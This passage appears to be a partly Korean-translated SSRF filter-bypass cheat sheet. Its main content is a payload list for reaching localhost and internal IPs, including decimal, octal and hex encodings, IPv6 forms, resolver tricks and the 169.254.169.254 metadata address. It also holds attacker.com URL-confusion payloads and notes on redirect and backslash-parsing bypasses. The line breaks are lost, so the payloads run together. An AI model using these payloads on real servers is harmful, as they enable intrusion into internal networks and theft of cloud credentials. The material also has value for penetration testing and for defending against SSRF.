# Localhosthttp://127.0.0.1:80http://127.0.0.1:443http://127.0.0.1:22http://127.1:80http://127.000000000000000.1http://0http:@0/-->http://localhost/http://0.0.0.0:80http://localhost:80http://[::]:80/http://[::]:25/SMTPhttp://[::]:3128/Squidhttp://[0000::1]:80/http://[0:0:0:0:0:ffff:127.0.0.1]/thefilehttp://①②⑦.⓪.⓪.⓪# CDIR bypasshttp://127.127.127.127http://127.0.1.3http://127.0.0.0# Dot bypass127。0。0。1127%E3%80%820%E3%80%820%E3%80%821# Decimal bypasshttp://2130706433/=http://127.0.0.1http://3232235521/=http://192.168.0.1http://3232235777/=http://192.168.1.1# Octal Bypasshttp://0177.0000.0000.0001http://00000177.00000000.00000000.00000001http://017700000001# Hexadecimal bypass127.0.0.1=0x7f000001http://0x7f000001/=http://127.0.0.1http://0xc0a80014/=http://192.168.0.200x7f.0x00.0x00.0x010x0000007f.0x00000000.0x00000000.0x00000001# Add 0s bypass127.000000000000.1# You can also mix different encoding formats# https://www.silisoftware.com/tools/ipconverter.php# Malformed and rarelocalhost:+11211aaalocalhost:00011211aaaahttp://0/http://127.1http://127.0.1# DNS to localhostlocaltest.me=127.0.0.1customer1.app.localhost.my.company.127.0.0.1.nip.io=127.0.0.1mail.ebc.apple.com=127.0.0.6 (localhost)127.0.0.1.nip.io=127.0.0.1 (Resolves tothegivenIP)www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us=Resolvestowww.google.comhttp://customer1.app.localhost.my.company.127.0.0.1.nip.iohttp://bugbounty.dod.network=127.0.0.2 (localhost)1ynrnhl.xip.io==169.254.169.254spoofed.burpcollaborator.net=127.0.0.1
# Try also to change attacker.com for 127.0.0.1 to try to access localhost# Try replacing https by http# Try URL-encoded charactershttps://{domain}@attacker.comhttps://{domain}.attacker.comhttps://{domain}%6D@attacker.comhttps://attacker.com/{domain}https://attacker.com/?d={domain}https://attacker.com#{domain}https://attacker.com@{domain}https://attacker.com#@{domain}https://attacker.com%23@{domain}https://attacker.com%00{domain}https://attacker.com%0A{domain}https://attacker.com?{domain}https://attacker.com///{domain}https://attacker.com\{domain}/https://attacker.com;https://{domain}https://attacker.com\{domain}/https://attacker.com\.{domain}https://attacker.com/.{domain}https://attacker.com\@@{domain}https://attacker.com:\@@{domain}https://attacker.com#\@{domain}https://attacker.com\anything@{domain}/https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com# On each IP position try to put 1 attackers domain and the others the victim domainhttp://1.1.1.1&@2.2.2.2#@3.3.3.3/#Parameter pollutionnext={domain}&next=attacker.com
경로 및 확장자 우회
만약 URL이 경로나 확장자로 끝나야 하거나 경로를 포함해야 하는 경우 다음 중 하나의 우회 방법을 시도할 수 있습니다:
도구 recollapse은 주어진 입력에서 변형을 생성하여 사용된 정규식을 우회하려고 시도할 수 있습니다. 자세한 정보는 이 게시물을 확인하십시오.
리디렉션을 통한 우회
서버가 SSRF의 원본 요청을 필터링하지만 해당 요청에 대한 리디렉션 응답은 필터링하지 않을 수 있습니다.
예를 들어, url=https://www.google.com/를 통해 SSRF에 취약한 서버가 url 매개변수를 필터링할 수 있습니다. 그러나 python 서버를 사용하여 302로 응답하고자 하는 리디렉션 위치로 이동하면 127.0.0.1과 같은 필터링된 IP 주소 또는 gopher와 같은 필터링된 프로토콜에 액세스할 수 있을 수 있습니다.
이 보고서를 확인하십시오.
_backslash 트릭_은 WHATWG URL 표준과 RFC3986 간의 차이점을 이용합니다. RFC3986은 URI에 대한 일반적인 프레임워크이지만, WHATWG는 웹 URL에 특화되어 있으며 현대 브라우저에서 채택되었습니다. 핵심 차이점은 WHATWG 표준이 백슬래시(\)를 슬래시(/)와 동등하게 인식하는 것에 있으며, 특히 URL에서 호스트 이름에서 경로로의 전환을 표시하는 방식에 영향을 줍니다.